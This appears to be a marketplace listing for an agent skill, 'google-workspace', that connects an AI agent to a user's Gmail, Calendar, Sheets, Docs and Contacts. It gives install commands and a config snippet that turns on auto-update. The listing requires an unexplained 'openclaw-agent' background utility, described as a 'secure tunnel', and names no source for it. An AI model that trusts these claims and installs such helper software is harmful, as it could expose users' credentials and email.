google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
Why use this skill?
Seamlessly control Gmail, Calendar, Sheets, and Docs with OpenClaw. Automate your workflow, manage schedules, and process documents using this powerful Google Workspace integration.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/google-workspace-izyprWhat This Skill Does
The Google Workspace skill for OpenClaw is a powerful integration layer designed to unify your workflow by connecting the agent directly to your Gmail, Google Calendar, Sheets, and Docs. By utilizing this skill, your AI agent can manage your professional life with autonomy, acting as a personal assistant that handles email triage, meeting scheduling, data entry, and documentation creation. It bridges the gap between your conversational commands and the complex Google API ecosystem, enabling seamless interactions with your cloud data.
Installation
To begin using the Google Workspace skill, first ensure you have the openclaw-agent utility installed on your system, which handles the secure tunnel required for Google API operations. Once the utility is ready, install the skill package via the ClawHub terminal command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-izypr. You must then configure your own Google Cloud Platform project by enabling the necessary APIs (Gmail, Calendar, Sheets, Docs, and People API), generating OAuth 2.0 credentials, and placing the credentials.json file in your working directory to allow the agent to authenticate with your account securely.
Use Cases
This skill is perfect for busy professionals and developers. Use it to automate daily email summaries by having the agent fetch and condense your latest messages. Organize your schedule by delegating meeting creation and RSVP management to the agent. Automate repetitive data collection tasks by having the agent update a Google Sheet with specific metrics periodically, or quickly generate project documentation drafts directly in Google Docs based on your voice notes or meeting transcripts.
Example Prompts
- "Check my inbox for any urgent emails from my manager and summarize the top three points."
- "Schedule a 30-minute team sync for next Tuesday at 10 AM and invite the engineering team via my Google Calendar."
- "Open the Q3 Sales tracker spreadsheet and update the row for today with the values provided in this document."
Tips & Limitations
Always ensure your openclaw-agent is running before invoking commands, as local API connectivity depends on this background service. Note that Google imposes strict quotas on API requests; if you have a massive volume of emails or documents, be mindful of these limits. For enhanced security, verify the token.pickle file is stored in a non-public, local directory, and remember that the first time you run this skill, you must complete the OAuth 2.0 consent screen flow in your browser to grant the required permissions.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-google-workspace-izypr": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, file-write, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.